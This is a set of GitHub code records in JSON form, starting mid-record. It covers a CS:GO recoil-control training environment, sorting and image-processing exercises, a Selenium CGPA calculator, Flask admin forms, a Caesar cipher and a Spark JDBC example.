time.sleep(2/self.timescale)\n\n        self.telnet_client.run(\"slot1\")\n        self.telnet_client.run(\"setang 0 -98\")\n        self.telnet_client.run(\"r_cleardecals\")\n\n        mouse.hold()\n        self.initial_state = np.zeros((2,), dtype=np.float32)\n        observation = self._get_obs()\n        self.initial_state = observation\n        return observation\n\n    def step(self, action):\n        self.step_counter += 1\n        \n        ak47_key, ak_47 = [(key, weapon) for key, weapon in self.server.gamestate.player.weapons.items() if weapon[\"name\"] == \"weapon_ak47\"][0]\n        ammo = ak_47[\"ammo_clip\"]\n        # reloading = ak_47[\"state\"] == \"reloading\"\n        \n        mouse.move(action[0]*100, action[1]*100, absolute=False)\n        \n        observation = self._get_obs()\n        sq = observation[0] ** 2 + observation[1] ** 2\n\n        current_ammo = ammo\n\n        done = current_ammo == 0\n\n        # Wait for next bullet to be fired\n        while current_ammo == ammo: # current_ammo >= ammo - N, where N is the number of bullets to wait until taking action\n            ak_47 = self.server.gamestate.player.weapons[ak47_key]\n            current_ammo = ak_47[\"ammo_clip\"]\n            done = current_ammo == 0\n            if done: break\n            time.sleep(0.005)\n        \n\n        # if sq < 230:\n        #     if sq < 1:\n        #         reward = 100/max(sq, 0.01)\n        #     else:\n        #         reward = -sq * 5\n        #     reward += 100/max(30-ammo, 0.01)\n        # else:\n        #     reward = -200000\n\n        if sq < 10:\n            reward = 10/max(sq, 0.1)\n        else:\n            reward = -sq\n\n        # print(ammo, reward, action[0], action[1])\n\n        if (done):\n            print(done)\n\n        \n\n        # print(self.step_counter, reward, [action[0]*100, action[1]*100])\n\n        return observation, reward, done, {}\n    \n    def close(self):\n        mouse.release()\n\n    def render(self, mode=\"\"):\n        pass\n\nif __name__ == \"__main__\":\n    env = CSGOEnvironment(timescale=1)\n    model = A2C(\"MlpPolicy\", env)  # A2C needs a policy and an environment to be constructed\n","repo_name":"stephancill/eee4118-csgo-project","sub_path":"src/custom_gym/csgo_environment.py","file_name":"csgo_environment.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"71847615204","text":"import time\n\ndef opti_bubble(data, drawdata, speed):\n    # bubble sort with an early-exit flag; redraws and highlights the pair just swapped\n\n    n = len(data)\n    update = True\n    j = 0\n    while (update==True and n > 1):\n        update = False\n        for i in range(len(data)-j -1):\n            if data[i] > data[i+1]:\n                data[i], data[i+1] = data[i+1], data[i]\n                drawdata(data, ['red' if x == i or x == i+1 else 'black' for x in range(len(data))])\n                time.sleep(speed)\n                update = True\n        n -= 1\n        j += 1\n    drawdata(data, ['green' for x in range(len(data))])\n\n    return data","repo_name":"JordinaGR/sorting-algs-visualization","sub_path":"algs/opti_bubble_sort.py","file_name":"opti_bubble_sort.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"}
+{"seq_id":"8611003330","text":"import itertools\nimport torch\nimport gpytorch\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.integrate import solve_ivp\n\ndef solveLotkaVolterra(_phi, _beta, _c, _T, _k, _nb_t=200000):\n    _ts = np.linspace(0, _T, _nb_t)\n    _a = np.array([_phi, -_beta, -_beta*_beta*_c])\n    \n    _b = np.array([0, -_beta, _beta])\n    \n    _A = np.array([[-1, _c, 1/_beta],\n                   [-1, _c, 1/_beta],\n                   [-1, _c, 1/_beta]])/2/_k\n    \n    _Gt = lambda t, s: -_a + -np.diag(s) @ (_b + _A@s) \n    \n    _sol = solve_ivp(_Gt, \n                     [_T, 0], \n                     np.array([0, 0, _beta * _c]), \n                     t_eval = _ts[::-1])\n    _Gt = _sol.y\n    \n    return _Gt, _ts\n\nclass ExactGPModel(gpytorch.models.ExactGP):\n    def __init__(self, train_x, train_y, likelihood, training_iterations):\n#         likelihood = 
gpytorch.likelihoods.GaussianLikelihood()\n super(ExactGPModel, self).__init__(train_x, train_y, likelihood)\n self.mean_module = gpytorch.means.ConstantMean()\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel(l=0.01))\n self.likelihood = likelihood\n self.reward_observation_times = []\n self.train_x = train_x\n self.train_y = train_y\n self.training_iterations = training_iterations\n def forward(self, x):\n mean_x = self.mean_module(x)\n covar_x = self.covar_module(x)\n return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)\n \n def trainn(self):\n # Find optimal model hyperparameters\n self.train()\n self.likelihood.train()\n \n # Use the adam optimizer\n optimizer = torch.optim.Adam(self.parameters(), lr=0.1) # Includes GaussianLikelihood parameters\n #\n # \"Loss\" for GPs - the marginal log likelihood\n mll = gpytorch.mlls.ExactMarginalLogLikelihood(self.likelihood, self)\n \n for i in range(self.training_iterations):\n optimizer.zero_grad()\n output = self(self.train_x)\n loss = -mll(output, self.train_y)\n loss.backward()\n optimizer.step()\n \ndef add_fwd_cols(all_fwd_cols, _LOB_features):\n for col in all_fwd_cols:\n fwd_w = int(col.split('_')[-1])\n _LOB_features[col] = _LOB_features['mid_price'].diff(fwd_w).shift(-fwd_w)\n \ndef updatePLT(W, l=4, w=3, fontsize=10):\n plt.rcParams.update({\n 'figure.figsize': (W, W/(l/w)), # 4:3 aspect ratio\n 'font.size' : fontsize, # Set font size to 11pt\n 'axes.labelsize': fontsize, # -> axis labels\n 'legend.fontsize': fontsize, # -> legends\n 'font.family': 'lmodern',\n 'text.usetex': True,\n 'text.latex.preamble': ( # LaTeX preamble\n r'\\usepackage{lmodern}'\n # ... more packages if needed\n )\n })\n \n","repo_name":"FDR0903/execution_latent_signals","sub_path":"nb/GPutils.py","file_name":"GPutils.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17648811443","text":"import sys\n\nn = None\ntry:\n n = int(input(\"n = \"))\nexcept ValueError:\n print(\"Nem számot adtál meg!\")\n sys.exit()\n\nosszeg = 0\n\nfor i in range(1, n, 1):\n \n # Összeadja a négyzetszámokat\n osszeg += i * i\n\n # Négyzetre emel\n i * i\n\n# Kiírja az átlagukat\nprint(osszeg / n)","repo_name":"tothm23/programozasi_alapok_BM","sub_path":"1019/negyzetszam.py","file_name":"negyzetszam.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4810192130","text":"'''\n*A script which can be used by svceians\n*This is an automted python script to calculate your CGPA directly from your cms.\n*Provided that you have to enter your cms login_id and password.\n___________________________________________________________________________________________\nPackages needed to run the script:\n-> selenium\n-> chrome|firefox webdriver\n-> BeautifulSoup\n___________________________________________________________________________________________\nKEY Feature\nCGPA Predicter:\n *How much grade you have to get in the subjects of current sem to achieve your dream CGPA\nWeb APP with these implementations.\n\n'''\n\n#necessary packages were imported selenium and BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport time\nfrom bs4 import BeautifulSoup\n\n#Upto which semester cgpa you need: enter here\nglobal I #This is assigned as a global variable 
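\n# NOTE: I is set below to (wanted semester + 1) and bounds the per-semester scraping loop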
\nsem = []\nprint('Enter your admission number(2016cse08xx):')\narr = input().upper()\nprint('')\nprint('Enter your Password:')\nu1 = input('pass')\nprint('------------------------------------------------------------------')\nprint('')\nprint('CGPA of Which Semester Wanted:')\nprint('Note::: Please ensure that you cms have the data till the sem number you are entering ')\nI = int(input()) + 1\n\n#Hit the webdriver\nbrowser = webdriver.Chrome()\nbrowser.get(\"https://cms.svce.ac.in/\") \ntime.sleep(2)\n\n#Enter User Credentials\nuser_id = 'ST'+arr+'.SVCE'\npasscode = u1\n\n#user_name and password field in the webpage is found using ID\nusername = browser.find_element_by_id(\"userName\")\npassword = browser.find_element_by_id(\"hashedpassword\")\n\n#Passing the user values\nusername.send_keys(user_id)\npassword.send_keys(passcode)\n\n#Entering values of submit button\nlogin_attempt = browser.find_element_by_xpath(\"//*[@type='submit']\")\nlogin_attempt.submit()\n\n#according to cms the university result field is hit for no of I semesters needed\nfor i in range(1,I):\n query = 'Semester '+ str(i)\n#much needed and important try and catch block to wait for all the operations to complete \n try:\n \n b = browser.find_element_by_xpath(\"//select[@id='semesterDropDown1']/option[text()='\" + query + \"']\").click()\n time.sleep(3)\n except:\n pass\n \n #page source code is parsed to BeautifulSoup\n page = browser.page_source\n soup = BeautifulSoup(page)\n unimark = soup.find(lambda tag: tag.name=='div' and tag.has_attr('id') and tag['id']==\"University_Mark\") \n \n rows = unimark.find('tbody')\n #Appending the subject code and grade of each subject to the list\n se = []\n for sr in rows.findAll('td'):\n\n if len(sr.text) <= 8 or len(sr.text) == 1:\n se.append(sr.text)\n sem.append(se)\n \n \n \n \n#Hit thi)s page to get the subject details and credits\nbrowser.get('https://cms.svce.ac.in/studentSubjectDetails')\npage = browser.page_source\nsoup = BeautifulSoup(page)\nunimark = soup.find(lambda tag: tag.name=='section' and tag.has_attr('id') and tag['id']==\"content\") \n\nrows = unimark.find('tbody')\n#Appending credits and subject codes to list c\nc = []\nfor sr in rows.findAll('td'):\n if len(sr.text) <= 8 or len(sr.text) == 1 or len(sr.text) == 2:\n c.append(sr.text)\n \n#converting the list c to dict\ncredits = dict(zip(c[::2], c[1::2]))\n\n#fisplit is the final splitup in where subject code , grades,marks are being matched\nlast = []\nfor i in sem:\n lee = []\n for j in range(0,len(i),2):\n li = []\n li.append(i[j])\n li.append(credits[i[j]])\n li.append(i[j+1])\n lee.append(li)\n last.append(lee)\n\n\n#function to calculate CGPA and GPA \ndef cal(sub):\n num = 0\n den = 0\n cgpa = 0\n \n for ent in sub:\n den += int(ent[1] )\n if ent[2].lower() == 's':\n num = num + 10*int(ent[1])\n elif ent[2].lower() == 'a':\n num = num + 9*int(ent[1])\n elif ent[2].lower() == 'b':\n num = num + 8*int(ent[1])\n elif ent[2].lower() == 'c':\n num = num + 7*int(ent[1])\n elif ent[2].lower() == 'd':\n num = num + 6*int(ent[1])\n elif ent[2].lower() == 'e':\n num = num + 5*int(ent[1])\n else:\n continue\n global den_c\n global num_c\n \n den_c += den\n num_c += num\n #For GPA Estimator\n n_g.append(num)\n d_g.append(den)\n n_cg.append(num_c)\n d_cg.append(den_c)\n gpa1 = num/den\n cgpa1 = num_c/den_c\n g.append(gpa1)\n cg.append(cgpa1)\n\n gpa = round(num/den,2)\n cgpa = round(num_c/den_c,2)\n print('GPA in SEM'+str(i+1)+':'+str(gpa))\n \n\n return [gpa,cgpa]\n#Function for CGPA Estimator\ndef run(exp,cc,s):\n 
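# GPA needed in semester s (cc credits) for the overall CGPA to reach exp\n    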
exp = float(exp)\n cc = int(cc)\n s= int(s)\n \n s = s-1\n anz = (((exp * float(d_cg[s])) - float(n_cg[s-1]))/cc)\n anzz = anz*cc\n if(anz <= 10 and anz >= 5):\n print('You have to score the GPA of : ' + str(round(anz,2))+' in sem '+str(esti)+' to get your Dream CGPA')\n else:\n print('Sorry Folks, Its not possible to achieve this CGPA..')\n print('You either would have entered a higher cgpa or a lesser which you cant get ')\n \n return [anz,anzz]\n\nden_c = 0\nnum_c = 0\ncgpa = 0\nd_g = []\nn_g = []\nd_cg = []\nn_cg = []\ng = []\ncg = []\n#All of those for this small piece \nfor i in range(len(last)):\n result = cal(last[i])\nprint('____________________________')\nprint('FINAL CGPA:'+ str(result[1]))\nprint('____________________________')\nprint('')\nprint('')\nprint('------------------------------------------------------------------------------------')\nprint('---------------------------NEW FETURE-----------------------------------------------')\nprint('------------------------------------------------------------------------------------')\nprint('You can now estimate how much GPA you need to get in a semester to get your dream CGPA ')\nprint('Example: I wrote till 5th semester and i have the data of subjects and marks till sem5 in my cms')\nprint('and i want to know, how much GPA do I have to get in SEM-6 to get 9.5?')\nprint('Well Its Possible here')\nprint('------------------------------------------------------------------------------------')\nprint('------------------------------------------------------------------------------------')\nprint('------------------------------------------------------------------------------------')\n\nxx = 0\nesti = input('Enter The Semester Number for which you want to know the estimate:')\ncc = input('Total Number of credits in the semester usually(25 or 23): ')\n\ndef ulti():\n exp = input('Enter your dream CGPA:')\n if int(esti) <= len(d_cg):\n run(exp,cc,esti)\n\n elif int(esti) == (len(d_cg)+1):\n d_cg.append(d_cg[int(esti) - 2] + int(cc) )\n\n lulu = run(exp,cc,esti)\n #print('You have to score the GPA of in sem ' +str(esti)+str(lulu[0])+' to get your Dream CGPA')\n\n d_cg.remove(d_cg[-1])\n else:\n print('Not enough data to process your request')\n print('The Data Scrapped is till sem '+str(len(n_cg)) )\n return\n\nwhile xx == 0:\n ulti()\n print('')\n print('Press 0 to continue and 1 to exit')\n xx += int(input())\n\n\n \n\n\n\n\n\n\n\n\n","repo_name":"vigneshdurairaj/C-kal_SVCE","sub_path":"SVCE_CGPA.py","file_name":"SVCE_CGPA.py","file_ext":"py","file_size_in_byte":7286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19995024238","text":"# -*- coding: utf-8 -*\n# Author: Alex Cater\n\"\"\"\n# @Author :Alex Cater\n# @Time : 2020/8/14 21:35\n# @File : forms.py\n\"\"\"\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, SubmitField, SelectMultipleField, SelectField,DateTimeField\nfrom wtforms.validators import DataRequired, EqualTo, ValidationError\n\nfrom app.models import Admin, Auth, Role,Machineroom,Machine,Platform\n\n\nclass LoginForm(FlaskForm):\n \"\"\"管理员登录表单\"\"\"\n account = StringField(\n label=\"账号\",\n validators=[\n DataRequired(\"请输入账号!\")\n ],\n description=\"账号\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入账号!\",\n\n }\n )\n pwd = PasswordField(\n label=\"密码\",\n validators=[\n DataRequired(\"请输入密码!\")\n ],\n description=\"密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入密码!\",\n\n }\n 
)\n submit = SubmitField(\n '登录',\n render_kw={\n \"class\": \"btn btn-primary btn-block btn-flat\",\n }\n )\n\n def validate_account(self, field):\n account = field.data\n # 查询账号并统计有几条\n admin = Admin.query.filter_by(name=account).count()\n if admin == 0:\n raise ValidationError(\"���号不存在!\")\n\n\nclass PwdForm(FlaskForm):\n \"\"\"修改密码表单\"\"\"\n old_pwd = PasswordField(\n label=\"旧密码\",\n validators=[\n DataRequired(\"请输入旧密码!\")\n ],\n description=\"旧密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入旧密码!\",\n }\n )\n new_pwd = PasswordField(\n label=\"新密码\",\n validators=[\n DataRequired(\"请输入新密码!\")\n ],\n description=\"新密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入新密码!\",\n }\n )\n submit = SubmitField(\n '编辑',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n\n def validate_old_pwd(self, field):\n from flask import session\n pwd = field.data\n name = session[\"admin\"]\n admin = Admin.query.filter_by(\n name=name\n ).first()\n if not admin.check_pwd(pwd):\n raise ValidationError(\"旧密码错误!\")\n\nclass MachineForm(FlaskForm):\n name = StringField(\n label=\"机器名称\",\n validators=[\n DataRequired(\"请输入机器名称!\")\n ],\n description=\"机器名称\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入机器名称!\",\n }\n )\n url = StringField(\n label=\"机器IP\",\n validators=[\n DataRequired(\"请输入机器IP!\")\n ],\n description=\"机器IP\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入机器IP!\",\n }\n )\n CPU = StringField(\n label=\"CPU型号\",\n description=\"CPU型号\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入CPU型号!\",\n }\n )\n RAM = StringField(\n label=\"内存容量\",\n validators=[\n DataRequired(\"请输入内存容量!\")\n ],\n description=\"内存容量\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入内存容量!\",\n }\n )\n IPMI = StringField(\n label=\"IPMI地址\",\n validators=[\n DataRequired(\"请输入IPMI地址!\")\n ],\n description=\"IPMI地址\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入IPMI地址!\",\n }\n )\n machineroom_id = SelectField(\n label=\"所属机房\",\n coerce=int,\n choices=[(v.id, v.name) for v in Machineroom.query.all()],\n render_kw={\n \"class\": \"form-control\",\n }\n )\n platform_id = SelectField(\n label=\"所属平台\",\n coerce=int,\n choices=[(v.id, v.name) for v in Platform.query.all()],\n render_kw={\n \"class\": \"form-control\",\n }\n )\n putontime = StringField(\n label=\"上架时间\",\n validators=[\n DataRequired(\"请选择上架时间!\")\n ],\n description=\"上架时间\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请选择上架时间!\",\n \"id\": \"input_release_time\"\n }\n )\n submit = SubmitField(\n '提交',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n\n\n\nclass AuthForm(FlaskForm):\n name = StringField(\n label=\"权限名称\",\n validators=[\n DataRequired(\"请输入权限名称!\")\n ],\n description=\"权限名称\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入权限名称!\"\n }\n )\n url = StringField(\n label=\"权限地址\",\n validators=[\n DataRequired(\"请输入权限地址!\")\n ],\n description=\"权限地址\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入权限地址!\"\n }\n )\n submit = SubmitField(\n '编辑',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n\n\nclass RoleForm(FlaskForm):\n name = StringField(\n label=\"角色名称\",\n validators=[\n DataRequired(\"请输入角色名称!\")\n ],\n description=\"角色名称\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入角色名称!\"\n }\n )\n auths = SelectMultipleField(\n label=\"权限列表\",\n validators=[\n 
DataRequired(\"请选择权限列表!\")\n ],\n coerce=int,\n choices=[(v.id, v.name) for v in Auth.query.all()],\n description=\"权限列表\",\n render_kw={\n \"class\": \"form-control\",\n }\n )\n submit = SubmitField(\n '编辑',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n\n\nclass AdminForm(FlaskForm):\n name = StringField(\n label=\"管理员名称\",\n validators=[\n DataRequired(\"请输入管理员名称!\")\n ],\n description=\"管理员名称\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入管理员名称!\",\n }\n )\n pwd = PasswordField(\n label=\"管理员密码\",\n validators=[\n DataRequired(\"请输入管理员密码!\")\n ],\n description=\"管理员密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入管理员密码!\",\n }\n )\n repwd = PasswordField(\n label=\"管理员重复密码\",\n validators=[\n DataRequired(\"请输入管理员重复密码!\"),\n EqualTo('pwd', message=\"两次密码不一致!\")\n ],\n description=\"管理员重复密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入管理员重复密码!\",\n }\n )\n role_id = SelectField(\n label=\"所属角色\",\n coerce=int,\n choices=[(v.id, v.name) for v in Role.query.all()],\n render_kw={\n \"class\": \"form-control\",\n }\n )\n submit = SubmitField(\n '编辑',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n","repo_name":"1458206584/Machine_Admin","sub_path":"app/admin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37808545692","text":"import cv2\nimport numpy as np\nimport math\n\n\n# when started put object to track into smaller rectangle and press space\n# to end press ESC\n\ndef get_back_histogram(image, hist):\n disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (27, 27))\n struct_element = cv2.calcBackProject([image], [0, 1], hist, [0, 150, 0, 256], 1)\n cv2.filter2D(struct_element, -1, disc, struct_element)\n return struct_element\n\n\ndef calculate_center(best_contour, last_center):\n centroid = cv2.moments(best_contour)\n if centroid['m00'] != 0:\n x_dimension, y_dimension = (int(centroid['m10'] / centroid['m00']), int(centroid['m01'] / centroid['m00']))\n return x_dimension, y_dimension\n else:\n return last_center\n\n\ndef calculate_contours(histogram_mask):\n histogram_gray = cv2.cvtColor(histogram_mask, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(histogram_gray, 0, 255, 0)\n contour, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n return contour\n\n\ndef masking_histogram(frame, histogram):\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n struct_element = get_back_histogram(frame_hsv, histogram)\n _, thresh = cv2.threshold(struct_element, 150, 255, cv2.THRESH_TOZERO)\n thresh = cv2.merge((thresh, thresh, thresh))\n return cv2.bitwise_and(thresh, frame)\n\n\nclass camera:\n first_place = []\n second_place = []\n\n def __init__(self):\n self.histogram_created_check = False\n\n self.histogram = None\n self.cap = cv2.VideoCapture(0)\n\n _, frame = self.cap.read()\n self.rows, self.cols, _ = frame.shape\n print(self.rows, self.cols)\n self.last_center = (int(self.rows / 2), int(self.cols / 2))\n\n def draw_place(self, frame):\n rows, cols, _ = frame.shape\n self.first_place = [(int(9.5 * cols / 20), int(9.5 * rows / 20)),\n (int(10.5 * cols / 20), int(10.5 * rows / 20))]\n cv2.rectangle(frame, self.first_place[0], self.first_place[1], (255, 0, 0))\n self.second_place = [(int(9 * cols / 20), int(7 * rows / 20)), (int(11 * cols / 20), int(13 * rows / 20))]\n cv2.rectangle(frame, self.second_place[0], self.second_place[1], (0, 0, 
255))\n return frame\n\n def create_histogram(self, frame):\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n hsv_frame = hsv_frame[self.first_place[0][1]: self.first_place[1][1],\n self.first_place[0][0]: self.first_place[1][0]]\n\n histogram = cv2.calcHist([hsv_frame], [0, 1], None, [150, 256], [0, 150, 0, 256])\n\n return cv2.normalize(histogram, histogram, 0, 255, cv2.NORM_MINMAX), hsv_frame\n\n def scan_object_fast(self):\n\n while self.cap.isOpened():\n ret, frame = self.cap.read()\n\n frame = cv2.flip(frame, 1)\n\n if self.histogram_created_check is False:\n frame = self.draw_place(frame)\n\n cv2.namedWindow('Scan', cv2.WINDOW_NORMAL)\n\n if cv2.waitKey(1) & 0xFF == 32:\n self.histogram_created_check = True\n self.histogram, _ = self.create_histogram(frame)\n break\n cv2.destroyAllWindows()\n cv2.destroyAllWindows()\n return self.histogram\n\n def search_for_object(self):\n ret, frame = self.cap.read()\n\n frame = cv2.flip(frame, 1)\n\n frame = self.draw_place(frame)\n self.histogram, _ = self.create_histogram(frame)\n return frame\n\n def scan_object(self):\n ret, frame = self.cap.read()\n\n frame = cv2.flip(frame, 1)\n\n frame = self.draw_place(frame)\n\n if cv2.waitKey(1) & 0xFF == 32:\n self.histogram_created_check = True\n self.histogram, _ = self.create_histogram(frame)\n return frame\n\n def set_histogram_created_check_not(self):\n self.histogram_created_check = False\n\n def get_center(self):\n ret, frame = self.cap.read()\n\n frame = cv2.flip(frame, 1)\n\n if self.histogram_created_check:\n hist_masked_image = masking_histogram(frame, self.histogram)\n kernel = np.ones((5, 5), np.uint8)\n hist_masked_image = cv2.erode(hist_masked_image, kernel)\n hist_masked_image = cv2.dilate(hist_masked_image, kernel)\n contour_list = calculate_contours(hist_masked_image)\n try:\n max_cont = max(contour_list, key=cv2.contourArea)\n cnt_centroid = calculate_center(max_cont, self.last_center)\n if math.sqrt((self.last_center[0] - cnt_centroid[0]) ** 2 +\n (self.last_center[1] - cnt_centroid[1]) ** 2) > 100:\n cnt_centroid = self.last_center\n else:\n self.last_center = cnt_centroid\n except ValueError:\n # print(\"out\")\n cnt_centroid = self.last_center\n cv2.circle(frame, cnt_centroid, 5, [255, 0, 255], -1)\n else:\n frame = self.draw_place(frame)\n\n return frame, cnt_centroid\n\n def check_quality(self, frame):\n hist_masked_image = masking_histogram(frame, self.histogram)\n erode_kernel = np.ones((5, 5), np.uint8)\n dilate_kernel = np.ones((5, 5), np.uint8)\n hist_masked_image = cv2.erode(hist_masked_image, erode_kernel)\n hist_masked_image = cv2.dilate(hist_masked_image, dilate_kernel)\n contour_list = calculate_contours(hist_masked_image)\n return len(contour_list)\n\n\ndef main(): # This main is for test purpose only\n usage = camera()\n\n cv2.namedWindow('Scan', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('Scan', 800, 600)\n while usage.histogram_created_check is False:\n frame = usage.scan_object()\n cv2.imshow('Scan', frame)\n cv2.destroyAllWindows()\n cv2.namedWindow('Live', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('Live', 800, 600)\n while usage.cap.isOpened():\n img, _ = usage.get_center()\n cv2.imshow('Live', img)\n if cv2.waitKey(1) & 0xFF == 27:\n break\n\n usage.cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wranidlo/Camera-Paint","sub_path":"camera/Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":6143,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} 
+{"seq_id":"71111670566","text":"string=str(input(\"input a String:\"))\r\nN=int(input(\"Enter length:\"))\r\nstring=string.lower()\r\nprint(\"Encrypted String:\",end='')\r\nfor c in string:\r\n asci=ord(c)\r\n if (asci>=97) & (asci <=122):\r\n asci+=N\r\n if asci>122:\r\n asci=asci%122 +96\r\n print(chr(asci),end='') ","repo_name":"AtriSaxena/CRYPTOGRAPHY","sub_path":"Ciphers/Cesar_Cipher/Cesar_cipher.py","file_name":"Cesar_cipher.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16840310509","text":"\"\"\"\n Appends content of a dataframe to a PostgreSQL database.\n Check for additional information in the README.md file in the same repository.\n\n @author rambabu.posa\n\"\"\"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import (StructType, StructField,\n StringType,IntegerType)\n\ndef createDataframe(spark):\n # Create the schema\n schema = StructType([StructField('fname', StringType(), False),\n StructField('lname', StringType(), False),\n StructField('id', IntegerType(), False),\n StructField('score', IntegerType(), False)])\n # data to create a dataframe\n data = [\n (\"Matei\", \"Zaharia\", 34, 456),\n (\"Jean-Georges\", \"Perrin\", 23, 3),\n (\"Jacek\", \"Laskowski\", 12, 758),\n (\"Holden\", \"Karau\", 31, 369)\n ]\n return spark.createDataFrame(data, schema)\n\ndef main(spark):\n df = createDataframe(spark)\n df.show(truncate=False)\n\n # Write in a table called ch17_lab900_pkey\n df.write.mode(\"append\") \\\n .format(\"jdbc\") \\\n .option(\"url\", \"jdbc:postgresql://localhost/spark_labs\") \\\n .option(\"dbtable\", \"ch17_lab900_pkey\") \\\n .option(\"driver\", \"org.postgresql.Driver\") \\\n .option(\"user\", \"jgp\") \\\n .option(\"password\", \"Spark<3Java\") \\\n .save()\n\nif __name__ == \"__main__\":\n # Creates a session on a local master\n spark = SparkSession.builder \\\n .appName(\"Addition\") \\\n .master(\"local[*]\").getOrCreate()\n\n # setting log level, update this as per your requirement\n spark.sparkContext.setLogLevel(\"warn\")\n\n main(spark)\n spark.stop()\n\n\n","repo_name":"jgperrin/net.jgp.books.spark.ch17","sub_path":"src/main/python/lab900_append_primary_key/appendDataJdbcPrimaryKeyApp.py","file_name":"appendDataJdbcPrimaryKeyApp.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"17023397284","text":"import argparse\n\n#lấy tham số từ cmd\nparser = argparse.ArgumentParser()\nparser.add_argument('filename', help='input CSV file')\nparser.add_argument('--out', help='output CSV file')\n\nargs = parser.parse_args()\n\nfilename = args.filename\noutput = args.out\n\nwith open(filename, 'r') as f:\n data = f.read()\n\n# Phân tích chuỗi CSV và tìm tên cột và dữ liệu\nrows = data.split('\\n')\ncolumn_names = rows[0].split(',')\ndata = [row.split(',') for row in rows[1:] if row]\n\n#tạo 1 list chứa các row độc nhất từ data và chuyển giá trị từ list đó vào lại data\nunique_data = set(tuple(row) for row in data)\ndata = [list(row) for row in unique_data]\n\n#xuat file\nwith open(output, 'w') as f:\n \n for i in range(len(column_names)): \n if i == len(column_names) - 1:\n f.write(str(column_names[i]) + '\\n')\n else:\n f.write(str(column_names[i]) + ',')\n\n for row in data:\n row_str = \",\".join(map(str, row))\n f.write(row_str + 
\"\\n\")","repo_name":"Sury2511/Data-Preprocessing-and-Data-exploration","sub_path":"cau6.py","file_name":"cau6.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40617088694","text":"import os \r\nimport numpy as np\r\nfrom skimage.color import rgb2gray\r\nfrom skimage import data, measure,io\r\nimport skimage as sk\r\nimport matplotlib.pyplot as plt\r\nfrom dct2 import dct2, idct2\r\nimport PIL as pil\r\nimport sys\r\n\r\n\r\n\r\nimg=io.imread('Im3Comp100.jpg')\r\nimg_gray = rgb2gray(img)\r\nimg_gray=sk.img_as_float(img_gray)\r\nplt.figure(1)\r\nplt.imshow(img_gray,cmap='gray')\r\nN = int(sys.argv[1])\r\nM = int(sys.argv[1])\r\nwindow_size = (N,M)\r\nimg_size=img_gray.shape\r\n\r\n\r\ndctblock=np.zeros(img_size)\r\nblock = np.zeros(window_size)\r\nprint(block.shape)\r\nprint(block.dtype)\r\n\r\n\r\n# table de quantification\r\nquant = np.zeros(window_size)\r\ncompr = N*M\r\nfor i in range(N):\r\n\tfor j in range(M):\r\n\t\tquant[i,j] = 1+(1+j+i)*compr\r\n\r\n#dct + quant\r\nfor i in range(0,img_size[0], N):\r\n\tfor j in range(0,img_size[1], 